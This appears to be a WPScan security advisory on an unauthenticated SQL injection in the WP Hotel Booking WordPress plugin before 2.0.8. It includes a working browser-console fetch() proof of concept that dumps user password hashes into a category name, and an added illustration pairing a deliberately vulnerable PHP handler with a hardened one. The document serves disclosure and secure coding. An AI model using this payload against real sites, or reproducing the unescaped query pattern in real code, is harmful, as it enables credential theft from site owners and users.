wpvulndb | Krzysztof Zając (CERT PL) | WPVDB-ID: 8EA46B9A-5239-476B-949D-49546371EAC1
Published: Oct 26, 2023 - 12:00 a.m.

WP Hotel Booking < 2.0.8 - Unauthenticated SQLi

Source: wpscan.com
6
Tags: wordpress, plugin, sql injection, unauthenticated, vulnerability

EPSS: 0.001 (percentile 51.4%)

Description: The plugin does not have authorisation and CSRF checks, and does not escape user input before using it in a SQL statement of a function hooked to admin_init. Because admin_init also fires for requests to admin-ajax.php, which does not require authentication, unauthenticated users can reach that statement and perform SQL injection.

PoC

Run the below command in the developer console of the web browser while on the blog, unauthenticated:

```javascript
// Unauthenticated POST to admin-ajax.php. The 'action' value is irrelevant: the vulnerable
// code runs on the admin_init hook, before WordPress looks up the AJAX action.
fetch("/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded; charset=UTF-8" },
  // Key 1 targets the term with term_id 1; the value closes the CASE expression the plugin
  // builds, appends extra SET clauses, and reopens a CASE so the query's own trailing END still parses.
  // The trailing space after "THEN 1" is intentional.
  "body": "action=x&taxonomy=hb_room_type&hb_room_type_ordering[1]=0 END, name=(SELECT GROUP_CONCAT(user_pass) FROM wp_users), term_id=CASE when 1=1 THEN 1 ",
  "method": "POST"
});
```

The above will set the name of the 1st category (visible in the backend as admin) to the GROUP_CONCAT of the user password hashes, even though the request itself returns HTTP 400: admin-ajax.php rejects the unregistered action `x`, but only after the admin_init hook has already executed the injected query.
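The following is an added example, not the plugin's actual code and not taken from the advisory. It reconstructs the shape of handler that the description and the PoC imply (a function on admin_init that reads `taxonomy` and `hb_room_type_ordering[term_id]=order` from POST and interpolates both into an UPDATE on the terms table) beside a hardened version that adds the missing authorisation check, nonce check and prepared statement. The function names, the `term_order` column, the capability `manage_categories` and the nonce action `hb_room_type_ordering` are assumptions for illustration.

```php
<?php
/*
 * Illustrative reconstruction (hypothetical), not WP Hotel Booking's real code.
 * Both functions hook admin_init, which WordPress fires for every request to
 * admin-ajax.php, authenticated or not, before the AJAX action is looked up.
 */

// --- Vulnerable pattern (assumed shape, inferred from the PoC payload) ---
function hb_room_type_ordering_vulnerable() {
    global $wpdb;
    if ( empty( $_POST['taxonomy'] ) || 'hb_room_type' !== $_POST['taxonomy'] ) {
        return;
    }
    if ( empty( $_POST['hb_room_type_ordering'] ) || ! is_array( $_POST['hb_room_type_ordering'] ) ) {
        return;
    }
    // No capability check, no nonce, no escaping: array key and value reach SQL verbatim.
    // With the PoC payload the statement becomes
    //   ... SET term_order = CASE term_id WHEN 1 THEN 0 END, name=(SELECT ...), term_id=CASE when 1=1 THEN 1  END WHERE term_id = 1
    foreach ( $_POST['hb_room_type_ordering'] as $term_id => $order ) {
        $wpdb->query(
            "UPDATE {$wpdb->terms} SET term_order = CASE term_id WHEN {$term_id} THEN {$order} END WHERE term_id = {$term_id}"
        );
    }
}
// add_action( 'admin_init', 'hb_room_type_ordering_vulnerable' ); // left unregistered on purpose

// --- Hardened pattern ---
function hb_room_type_ordering_hardened() {
    global $wpdb;
    if ( empty( $_POST['taxonomy'] ) || 'hb_room_type' !== $_POST['taxonomy'] ) {
        return;
    }
    // Authorisation: anonymous visitors and low-privilege users are rejected here.
    if ( ! current_user_can( 'manage_categories' ) ) {
        return;
    }
    // CSRF: the submitting form must carry wp_nonce_field( 'hb_room_type_ordering' );
    // check_admin_referer() dies on a missing or invalid nonce.
    check_admin_referer( 'hb_room_type_ordering' );
    if ( empty( $_POST['hb_room_type_ordering'] ) || ! is_array( $_POST['hb_room_type_ordering'] ) ) {
        return;
    }
    foreach ( $_POST['hb_room_type_ordering'] as $term_id => $order ) {
        // Integers only, placed by $wpdb->prepare(): the PoC payload degrades to term_order = 0
        // for term_id 1, and no SET/CASE fragments can be smuggled in.
        $wpdb->query( $wpdb->prepare(
            "UPDATE {$wpdb->terms} SET term_order = %d WHERE term_id = %d",
            absint( $order ),
            absint( $term_id )
        ) );
    }
}
add_action( 'admin_init', 'hb_room_type_ordering_hardened' );
```

The order of the checks matters: the capability test comes before the nonce test so that an unauthenticated request is turned away without ever touching the database, and only then are the values cast and bound. The same three controls (capability, nonce, prepared statement) are what a reviewer should look for in any other admin_init or admin-ajax handler in the plugin.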
